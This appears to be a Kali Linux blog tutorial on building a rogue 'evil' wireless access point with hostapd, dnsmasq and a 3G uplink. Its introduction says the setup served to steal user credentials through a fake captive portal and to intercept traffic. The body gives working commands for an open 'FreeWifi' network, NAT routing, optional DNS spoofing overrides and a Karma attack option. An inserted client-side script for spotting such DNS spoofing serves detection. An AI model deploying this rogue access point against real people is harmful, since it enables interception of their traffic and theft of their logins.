Kali Linux Evil Wireless Access Point
A few days ago, we had the opportunity to deploy a rogue access point that would steal user credentials using a fake, captive web portal, and provide MITM’d Internet services via 3G. We needed reliability and scalability in our environment as there would potentially be a large number of, erm… “participants” in this wireless network. We were pretty happy with the result and quickly realized that we had created a new “Kali Linux recipe”. In other words, we could create a custom, bootable wireless evil access point image, which could do all sorts of wondrous things.
Required Hardware
- We used a battery-powered Raspberry Pi for this project, however the instructions below will work on pretty much anything that can run Kali Linux and has 2 free USB ports – ARM and virtual environments included.
- A supported USB wireless adapter; we used an old Netgear WNA1000 we had lying around.
- A supported 3G modem; we found a TP-Link MA180 3.75G HSUPA USB Adapter in a local shop.
Simple Setup of DNS and DHCP
We ended up building our wireless access point with hostapd and dnsmasq in a relatively simple setup. We found that this gave the most reliable performance and was the easiest to configure. In addition, using dnsmasq allowed us to easily control spoofed DNS queries. We start by installing all our prerequisites:
apt-get install -y hostapd dnsmasq wireless-tools iw wvdial
Once everything is installed, we configure dnsmasq to serve DHCP and DNS on the wireless interface and then start the dnsmasq service.
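# Point the hostapd init script at the configuration file created later on.
sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd
cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
# Optional DNS overrides, disabled by default.
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,12h
# DHCP option 3 is the default gateway, option 6 the DNS server.
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF
service dnsmasq start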
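From the client side, the DNS behaviour this dnsmasq configuration produces once the commented-out `address=` lines are enabled can be recognised from the answers alone. The following is an added example, not part of the original post; the function names and sample answers are constructed, and live input is assumed to come from querying the network's resolver.

```shell
#!/bin/sh
# Added example, not from the original post. Names and data are constructed.
# Input to check_answers: "<name> <ipv4>" lines as answered by the network's
# resolver, e.g. gathered with: dig +short A "$name" @"$resolver"

# is_private IP: succeeds for RFC 1918, loopback and link-local addresses.
is_private() {
    case "$1" in
        10.*|192.168.*|127.*|169.254.*) return 0 ;;
        172.1[6-9].*|172.2[0-9].*|172.3[01].*) return 0 ;;
    esac
    return 1
}

# check_answers: reads answers on stdin and prints one verdict.
#   WILDCARD  two or more unrelated names all resolved to one address
#   PRIVATE   a public name resolved to a private address
#   OK        neither pattern seen
check_answers() {
    first="" same=1 count=0 private=0
    while read -r name ip; do
        [ -n "$name" ] && [ -n "$ip" ] || continue
        count=$((count + 1))
        if [ -z "$first" ]; then first=$ip
        elif [ "$ip" != "$first" ]; then same=0
        fi
        if is_private "$ip"; then private=1; fi
    done
    if [ "$count" -ge 2 ] && [ "$same" -eq 1 ]; then echo WILDCARD
    elif [ "$private" -eq 1 ]; then echo PRIVATE
    else echo OK
    fi
}

# Constructed answers: every name, including a made-up one, maps to 10.0.0.1.
sample_wildcard() {
    printf '%s\n' 'example.com 10.0.0.1' 'example.org 10.0.0.1' \
        'nx-7f3a9c.example.net 10.0.0.1'
}
# Constructed answers: only one name is overridden.
sample_single() {
    printf '%s\n' 'example.com 10.0.0.1' 'example.org 203.0.113.7'
}
# Constructed answers using documentation-range public addresses.
sample_clean() {
    printf '%s\n' 'example.com 192.0.2.10' 'example.org 203.0.113.7'
}

sample_wildcard | check_answers
```

Query names that do not share hosting, plus one random label that should not exist, so that a single shared address is meaningful.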
Setting up the 3G Connection
This part was surprisingly simple using the GNOME NetworkManager GUI. Adding a new 3G connection and going through the automated wizard got us online in a couple of minutes. Once connected, we saw our new ppp0 WAN interface, now providing us with Internet access. Alternatively, this setup can be performed at the command line using wvdial. Now that we have our WAN connection set up, let’s move on to setting up the wireless access point.
Setting up the Wireless Access Point
Setting up the access point is a breeze using hostapd. We configure an IP for the wireless interface, and configure iptables rules for NAT. Then we quickly configure the hostapd service to use our wireless interface to run an access point with the SSID “FreeWifi”. Once the service is started, a wireless network called “FreeWifi” should show up. Anyone connecting to this network would be routed through our Kali box, out to the Internet over 3G.
# Bring up the wireless interface and give it the gateway address.
ifconfig wlan0 up
ifconfig wlan0 10.0.0.1/24
# Flush existing rules, then NAT wireless clients out through the 3G link.
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o ppp0 -j ACCEPT
# Enable IPv4 forwarding in the kernel.
echo '1' > /proc/sys/net/ipv4/ip_forward
cat <<EOF > /etc/hostapd/hostapd.conf
interface=wlan0
driver=nl80211
ssid=FreeWifi
channel=1
# Yes, we support the Karma attack.
#enable_karma=1
EOF
service hostapd start